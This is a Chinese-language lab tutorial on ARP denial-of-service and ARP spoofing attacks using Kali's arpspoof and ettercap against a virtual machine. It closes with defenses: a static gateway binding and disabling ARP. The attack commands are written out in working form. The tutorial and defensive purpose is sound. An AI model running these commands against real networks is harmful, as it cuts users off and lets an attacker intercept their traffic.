一、arp断网攻击
arp攻击是针对同一局域网内的靶机发起攻击,使被攻击的靶机断网,需要知道被攻击目标的地址,网关,和本机网卡。
1.用命令查询需要知道的信息
arpspoof -i 网卡 -t 目标IP 网关 //arp攻击
ifconfig //查看目标机ip和网卡(在目标机查看,如果不能进入目标机,则用fping在攻击机上查看存活ip)
cat /etc/resolv.conf //查看目标机网关
fping -asg 192.168.252.0/24 //查看局域网当中存活的ip
查询目标机的ip和网关
2.用errercap图形化工具来查询靶机信息
errercap -G
errtecap
选择Sniff——Unified sniffing(统一嗅探)(默认eth0)——Hosts——Scan for hosts
image.png
image.png
3.确定靶机IP和网关后,可以发起断网攻击。
kali系统发起攻击
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2
kali发起arp攻击
攻击前ping百度是正常的。
攻击前ping百度
当受到攻击时,ping百度就不通了。说明目标机在受到攻击时,网络被迫中断。
攻击后ping百度不通
当kali放开攻击时,目标机网络连接正常。
二、arp欺骗攻击是冒充网关向靶机发送假的arp数据包。
echo 1 > /proc/sys/net/ipv4/ip_forward //冒充过程
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2 //欺骗攻击
发起arp欺骗攻击时,被攻击的靶机不会断网。
image.png
三、防止arp攻击
一般在网上通讯的时候网关的IP和MAC的绑定是放在arp 缓存里面的,假的arp包就会刷新这个缓存,导致本该发送到网关的数据包发到了欺骗者那里。
image.png
1.防止arp攻击的一种有效方式是静态arp。将网关的ip和MAC进行绑定。使攻击者无法假装网关对靶机进行攻击。
vim /etc/ethers
192.168.252.2 00:50:56:e0:7e:06
image.png
刷新arp发现网关后多了一个M,表示静态网关
刷新arp
再次尝试用kali攻击靶机,发现,即使在攻击中,靶机也可以照常使用网络。
image.png
ps:解除绑定命令
arp -d 192.168.252.2
image.png
2.第二种方式是关闭arp解析功能
ifconfig eth0 -arp //关闭arp
但是,这样就不能跟局域网内其他用户进行通信了,也就不能使用xshell来连接虚拟机了。
ifconfig eth0 arp //开启arp解析功能
